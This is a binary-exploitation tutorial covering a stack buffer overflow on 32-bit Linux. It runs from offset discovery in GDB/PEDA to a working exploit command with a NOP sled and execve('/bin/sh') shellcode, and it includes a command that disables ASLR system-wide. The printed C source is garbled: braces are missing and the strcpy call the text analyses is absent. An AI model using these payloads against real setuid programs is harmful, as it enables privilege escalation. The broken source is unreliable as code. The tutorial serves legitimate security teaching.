Lets go over a simple buffer overflow on a Linux x86 system. I will be using GDB along with PEDA for my debugger. In this tutorial I will be going over how we can inject shellcode into an application's memory and execute it. If you need a VM already setup, I created one here. I recommend that you have some basic knowledge about:

* Python
* x86 Assembly
* C programming
* Linux

Download PEDA

Target application and other information.

[+] Name: ezbof
[+] Gcc version: gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1)
[+] Compiled with gcc: gcc -fno-stack-protector -z execstack -no-pie ezbof.c -o ezbof
[+] System Kernel Information: Linux 4.9.0-6-686-pae #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) GNU/Linux

Source code for ezbof

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void pb(char *buf);

int main(int argc, char **argv)
	if (argc < 2)
		printf("%s <string>\n",argv[0]);
	return 0;

void pb(char *buf)
	char buffer[32];
	printf("[+] Buffer: %s\n");

Before we begin make sure to disable ASLR, to do this open a terminal and run:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Alright lets begin with loading our binary into GDB and taking a look at the disassembly. You can do this by running:

gdb -q ezbof
gdb-peda$ disas main


On the left we have the address of our instructions and on the right we have our opcodes. Notice the call instruction at 0x080484ba. This is the call to function pb(), lets disassemble it.

gdb-peda$ disas pb


If we examine the instructions we can see a call to strcpy() at 0x080484ed. This is our vulnerable call it will copy a buffer from its beginning to a null byte / newline to another buffer in memory, meaning we can write as big as a buffer as we want and it will copy it to the destination. This functionality will allow us to overflow a target buffer (The buffer being written to by the strcpy() call). Now lets begin looking for offsets, offsets will allow us to know how many bytes to pad before putting the address we want to jump to. So most people at this point will break out the pattern_create and pattern_search. But I want to show you manually to help bring a better understanding. Lets start by creating buffers with python. I will be using the python 2.7 sys.stdout.write() method. The reason for using python 2.7 is that I have found that python 3 will encode bytes higher than 0x7f making it very difficult to allow accurate control over the EIP (Extended Instruction Pointer) register. Also I am using the sys.stdout.write() method because it will not add a newline like print() does which will allow us full control over the buffer we send to stdout. Alright lets begin.

Create a payload to start with, let's start with 100 bytes. In GDB to begin running a program you use r. Imagine r is the name of the program you are running. So put the arguments after it like so.

gdb-peda$ r $(python -c 'import sys;sys.stdout.write("A"*100)')

This will run ezbof with 100 A's for the first argument. In hex 0x41 is A so we will be looking for 0x41 in our stack. The program should have crashed, if it did not double check that you compiled the binary correctly and got the python argument correct.


We have crashed the program by overflowing into the EIP (Extended Instruction Pointer) register. Side note, when I say 'overflowing into EIP', that is technically not correct. What is really happening is out buffer writes down the stack and overwrites the saved return pointer, this causes the 'ret' instruction at the end of the function call to POP a part of my overflown buffer from the stack into the EIP register. Now we know we can gain control of execution but lets find the offset now. Because the binary is 32 bit we should add 4 B's to the end of our payload, these four bytes will fully fill our EIP register. Once we see our binary crash at 0x42424242 we will know that the amount of A's we used is our offset to overwrite EIP. To find your offset, decrease the amount of A's you have as your offset until you see the B's fill EIP. I am just going to skip to having the correct offset.


As you see here the program execution tried to jump to the address 0x42424242 or in ASCII form BBBB. If you haven't already figured it out our offset will be 44, because there are 44 bytes until our 4 B's and our 4 B's are the bytes overflowing into EIP. This is where we will place our return address. Our return address needs to point at our shellcode which can be a tad tricky as the addresses we are pointing to will have different values once we run our exploit outside of GDB. The reason for this is because GDB stores things on the stack as well and when you run the binary outside GDB your return address will change because the additional things stored on the stack by GDB will no longer exist. Lets begin creating a payload and directing code execution. To begin lets create the base of our payload. Our payload structure will look like this:

python -c 'import sys;sys.stdout.write(("A"*44)+("B"*4)+("C"*55))'

So our payload will have our offset of 44 A's then our EIP (the address we want code execution to jump to) which in this case is our B's. Then after it we have our C's, the C's are where we want to point our code execution to. Also we have 55 to make sure we have at least 55 bytes of space after our B's to place NOPs and shellcode.
More on NOPs


As you can see in the stack section of our PEDA output you can see our C's filling up the stack. Also in the stack section you will notice the blue addresses on the left these are our stack addresses. We want to point our execution to one of those once we add our shellcode. Also side note we are going to point at the top of the stack to keep this simple. The address we need to point to while in GDB is different than the address outside of GDB due to environmental variables added by GDB to the stack. We will use NOPs to make this easier for us. NOPs are No-Operation instructions, in the x86 architecture 0x90 is the byte for a NOP instruction. NOP instructions simply do nothing except increment the instruction pointer one instruction. This can be used to basically create a big landing pad for our instruction pointer to point to, then once our instruction pointer is pointing at our NOPs it will simply increment through one instruction after another until it is pointing at our shellcode which will then be executed. This will make it easier on us once we move out of GDB. Lets begin working on getting our EIP register to point to our NOPs.

Here I have added NOPs (0x90) to our payload.

gdb-peda$ r $(python -c 'import sys;sys.stdout.write(("A"*44)+("B"*4)+("\x90"*32)+("C"*23))')


As you can see our NOPs are now on the stack as well. Now we need to point EIP to our NOPs on the stack. In my case I will be pointing my EIP to 0xbffff880, your stack address may be different.

gdb-peda$ disas pb
gdb-peda$ b * 0x0804850c
gdb-peda$ r $(python -c 'import sys;sys.stdout.write(("A"*44)+("\x80\xf8\xff\xbf")+("\x90"*32)+("C"*23))')

First I disassemble the pb() function to find the address of our ret instruction.


In my case it is 0x0804850c it may be different for you. Next I set a breakpoint at the address for the ret instruction, this will allow us to pause execution and examine the stack at that instruction.


After setting the breakpoint I run the program with my payload pointing at my NOPs.


The 0000 in the stack section is the top of the stack. This is where the ESP (Extended Stack Pointer) register points. Once the ret instruction executes it will jump to the address in ESP. I have put my address in place of my B's so now once the ret instruction is executed it will jump to 0xbffff880 which is where my NOP instructions are located on the stack. A ret instruction is just a POP EIP instruction so if it helps, think of it that way. Also if you are like what the nuggets pinky why did you put your address in backwards!? The reason I did this is because Intel x86 processors use little-endian, they read the least significant byte first. More on this below.
More on Endianness

To help make this clearer I'll give some examples.

Normal: 0xdeadbeef <=> Little-Endian: 0xefbeadde
Normal: 0xbffff880 <=> Little-Endian: 0x80f8ffbf
Normal: 0x12345678 <=> Little-Endian: 0x78563412

In my python payload I did it like this:

python -c 'import sys;sys.stdout.write(("A"*44)+("\x80\xf8\xff\xbf")+("\x90"*32)+("C"*23))'

Notice the "\x80\xf8\xff\xbf" this is the address I want to jump to in little-endian form.

Now lets add some shellcode to execute! I will be using this shellcode:


You can find this shellcode below. This shellcode is 23 bytes long, we will be putting it after our NOPs.
Get Shellcode

gdb-peda$ b * 0x0804850c
gdb-peda$ r $(python -c 'import sys;sys.stdout.write(("A"*44)+("\x80\xf8\xff\xbf")+("\x90"*32)+("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"))')


At my breakpoint you can see ESP is pointing to the address that points to my NOPs which will guide the instruction pointer to my shellcode. Let's continue execution with 'c'.

gdb-peda$ c


As you can see, /bin/dash has executed in most Linux machines today /bin/sh is just a link to /bin/dash. That is why when we executed /bin/sh in our shellcode /bin/dash was executed. Alright now that we have code execution let's move out of GDB!

gdb-peda$ q

To find the offset from GDB to outside GDB just keep adding 0x10 (16 in decimal) to your return address until you get code execution. You will eventually stumble upon our NOPs which will guide EIP to our shellcode. My offset happened to be 0x50 (80 in decimal). So instead of my return address being 0xbffff880, it is 0xbffff8d0 when outside of GDB. Here is the end result.

./ezbof $(python -c 'import sys;sys.stdout.write(("A"*44)+("\xd0\xf8\xff\xbf")+("\x90"*32)+("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"))')


If for example this binary was owned by root and the setuid bit was enabled you could escalate privileges with this overflow.

If you made it to the end thank you for reading and I hope you learned or gained some sort of knowledge from this. My goal was to go over this topic in better detail than what I have found on this topic in the past. I included things I wish I could have found when I was learning binary exploitation. If you enjoyed feel free to share it. If you have feedback let me know on twitter!

Twitter: @Pink_P4nther